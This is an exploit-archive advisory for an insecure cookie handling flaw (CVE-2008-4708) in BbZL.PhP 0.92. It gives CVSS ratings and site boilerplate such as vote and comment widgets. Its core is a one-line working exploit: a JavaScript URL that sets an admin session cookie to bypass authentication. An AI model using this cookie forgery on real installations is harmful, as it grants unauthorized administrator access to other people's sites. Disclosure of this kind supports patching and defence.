BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability

2008.10.26

Credit: Stack

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-4708

CWE: CWE-287

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

###############################################################################################
[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack            
[+] Greetz : All my freind           
################################################################################################
Exploit:
javascript:document.cookie = "phorum_admin_session=1; path=/";

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.